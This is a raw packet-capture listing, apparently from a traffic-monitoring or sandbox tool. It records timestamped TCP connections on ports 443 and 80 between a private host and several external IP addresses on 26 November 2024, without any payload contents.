Nov 26, 2024 00:25:05.880089998 CET	49711	443	192.168.2.6	20.198.118.190
Nov 26, 2024 00:25:05.880135059 CET	443	49711	20.198.118.190	192.168.2.6
Nov 26, 2024 00:25:05.880213022 CET	49711	443	192.168.2.6	20.198.118.190
Nov 26, 2024 00:25:05.880820990 CET	49711	443	192.168.2.6	20.198.118.190
Nov 26, 2024 00:25:05.880837917 CET	443	49711	20.198.118.190	192.168.2.6
Nov 26, 2024 00:25:06.055730104 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:06.055838108 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:06.071001053 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:06.071022034 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:06.071261883 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:06.071615934 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:06.071666002 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:06.071705103 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:06.726454020 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:06.726478100 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:06.726516962 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:06.726557016 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:06.726567984 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:06.726593018 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:06.726612091 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:06.727288961 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:06.727317095 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:06.727334976 CET	49708	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:06.727341890 CET	443	49708	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:07.124536991 CET	443	49709	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.124660015 CET	49709	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.148371935 CET	49709	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.148430109 CET	443	49709	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.148864985 CET	443	49709	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.149463892 CET	49709	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.149905920 CET	49709	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.149955988 CET	443	49709	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.410551071 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.410664082 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.422662020 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.422734976 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.422858953 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.422878981 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.423022032 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.423126936 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.740077019 CET	443	49709	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.740096092 CET	443	49709	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.740154028 CET	49709	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.740154028 CET	49709	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.740170002 CET	443	49709	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.740340948 CET	49709	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.748821020 CET	49709	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.748863935 CET	443	49709	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.826241016 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.826267958 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.826383114 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.826455116 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.826549053 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.827653885 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.827708960 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:07.827713013 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.827775955 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.835041046 CET	49710	443	192.168.2.6	20.223.35.26
Nov 26, 2024 00:25:07.835061073 CET	443	49710	20.223.35.26	192.168.2.6
Nov 26, 2024 00:25:08.165353060 CET	443	49711	20.198.118.190	192.168.2.6
Nov 26, 2024 00:25:08.165446997 CET	49711	443	192.168.2.6	20.198.118.190
Nov 26, 2024 00:25:08.169101000 CET	49711	443	192.168.2.6	20.198.118.190
Nov 26, 2024 00:25:08.169120073 CET	443	49711	20.198.118.190	192.168.2.6
Nov 26, 2024 00:25:08.169389009 CET	443	49711	20.198.118.190	192.168.2.6
Nov 26, 2024 00:25:08.173774958 CET	49711	443	192.168.2.6	20.198.118.190
Nov 26, 2024 00:25:08.173835039 CET	49711	443	192.168.2.6	20.198.118.190
Nov 26, 2024 00:25:08.173841000 CET	443	49711	20.198.118.190	192.168.2.6
Nov 26, 2024 00:25:08.174096107 CET	49711	443	192.168.2.6	20.198.118.190
Nov 26, 2024 00:25:08.215367079 CET	443	49711	20.198.118.190	192.168.2.6
Nov 26, 2024 00:25:08.728096962 CET	443	49711	20.198.118.190	192.168.2.6
Nov 26, 2024 00:25:08.728235960 CET	443	49711	20.198.118.190	192.168.2.6
Nov 26, 2024 00:25:08.728307962 CET	49711	443	192.168.2.6	20.198.118.190
Nov 26, 2024 00:25:08.728408098 CET	49711	443	192.168.2.6	20.198.118.190
Nov 26, 2024 00:25:08.728424072 CET	443	49711	20.198.118.190	192.168.2.6
Nov 26, 2024 00:25:09.224462032 CET	49714	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:09.224492073 CET	443	49714	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:09.224801064 CET	49714	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:09.225389004 CET	49714	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:09.225404978 CET	443	49714	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:11.500812054 CET	443	49714	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:11.500911951 CET	49714	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:11.504246950 CET	49714	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:11.504265070 CET	443	49714	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:11.504497051 CET	443	49714	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:11.506268024 CET	49714	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:11.506314993 CET	49714	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:11.506320953 CET	443	49714	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:11.506467104 CET	49714	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:11.547337055 CET	443	49714	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:12.032727003 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:12.061193943 CET	443	49714	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:12.061474085 CET	443	49714	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:12.061942101 CET	49714	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:12.062140942 CET	49714	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:12.062153101 CET	443	49714	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:12.062166929 CET	49714	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:12.152760983 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:12.153018951 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:12.153649092 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:12.277240038 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:12.787085056 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:12.787128925 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:12.787277937 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:12.788568974 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:12.788580894 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:13.529400110 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:13.529474020 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:13.533041000 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:13.652926922 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:13.994708061 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:13.994827986 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:13.996191025 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:14.116167068 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:14.444504976 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:14.444587946 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:14.444614887 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:14.444695950 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:14.445828915 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:14.567471027 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:14.578568935 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:14.578685045 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:14.582524061 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:14.582531929 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:14.582914114 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:14.592032909 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:14.639332056 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:14.896066904 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:14.896095991 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:14.896110058 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:14.896173000 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:14.896202087 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:14.896233082 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:14.896245956 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:14.896260023 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:14.896290064 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:14.896342039 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:14.898262978 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:14.979026079 CET	49674	443	192.168.2.6	173.222.162.64
Nov 26, 2024 00:25:14.979032993 CET	49673	443	192.168.2.6	173.222.162.64
Nov 26, 2024 00:25:15.019927979 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:15.120125055 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.120152950 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.120170116 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.120213032 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.120230913 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.120256901 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.120289087 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.260296106 CET	49672	443	192.168.2.6	173.222.162.64
Nov 26, 2024 00:25:15.311017036 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.311048985 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.311094999 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.311108112 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.311153889 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.311153889 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.347980022 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:15.348048925 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:15.369973898 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.369992971 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.370073080 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.370085955 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.370147943 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.386125088 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:15.386251926 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:15.482748032 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.482769012 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.482887983 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.482903004 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.482976913 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.506043911 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:15.506180048 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:15.506201982 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:15.506210089 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:15.506433010 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:15.506449938 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:15.506478071 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:15.512398005 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.512424946 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.512521982 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.512521982 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.512536049 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.512579918 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.536530972 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.536550045 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.536637068 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.536648035 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.536689997 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.562316895 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.562340021 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.562411070 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.562422991 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.562473059 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.562549114 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.682957888 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.682990074 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.683130026 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.683146954 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.683227062 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.696180105 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.696201086 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.696310043 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.696317911 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.696408987 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.710628033 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.710652113 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.710762024 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.710772038 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.710817099 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.724980116 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.725001097 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.725110054 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.725119114 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.725205898 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.737548113 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.737564087 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.737653971 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.737662077 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.737728119 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.752115965 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.752135992 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.752216101 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.752216101 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.752224922 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.753074884 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.758183956 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.758248091 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.758251905 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:15.758328915 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.791068077 CET	49716	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:15.791085958 CET	443	49716	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:16.011287928 CET	49717	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.011327028 CET	443	49717	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:16.011473894 CET	49717	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.012234926 CET	49718	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.012274027 CET	443	49718	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:16.012466908 CET	49718	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.026422977 CET	49717	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.026447058 CET	443	49717	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:16.029071093 CET	49718	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.029083014 CET	443	49718	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:16.040694952 CET	49719	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.040713072 CET	443	49719	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:16.040851116 CET	49719	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.041260958 CET	49719	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.041275978 CET	443	49719	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:16.085407972 CET	49720	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.085453987 CET	443	49720	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:16.085510015 CET	49720	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.086838007 CET	49721	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.086884975 CET	443	49721	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:16.086956978 CET	49721	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.087482929 CET	49720	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.087497950 CET	443	49720	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:16.087918997 CET	49721	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:16.087934017 CET	443	49721	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:16.356446028 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:16.356530905 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:16.638652086 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:16.758658886 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.086791992 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.086853027 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.086882114 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.086931944 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.089246988 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.089315891 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.089539051 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.089592934 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.097666979 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.097747087 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.097779989 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.097883940 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.106076002 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.106200933 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.106225014 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.106321096 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.114514112 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.114619017 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.114636898 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.114713907 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.122977972 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.123038054 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.123136044 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.123255014 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.211656094 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.211746931 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.211765051 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.211833000 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.215893984 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.215996027 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.216034889 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.216034889 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.224298000 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.224396944 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.224420071 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.224633932 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.232754946 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.232829094 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.232856035 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.232960939 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.241142035 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.241307974 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.287862062 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.287919998 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.287987947 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.288080931 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.291995049 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.292126894 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.293531895 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.293585062 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.293621063 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.293698072 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.301987886 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.302046061 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.302073002 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.302124977 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.310412884 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.310468912 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.310529947 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.310587883 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.318846941 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.318931103 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.318948984 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.318994045 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.327325106 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.327383041 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.327445984 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.335675955 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.335735083 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.338418961 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.338555098 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.338562965 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.338639975 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.346879959 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.346904993 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.346952915 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.346952915 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.352345943 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.352415085 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.352438927 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:17.352560043 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:17.360805988 CET	80	49715	185.215.113.206	192.168.2.6
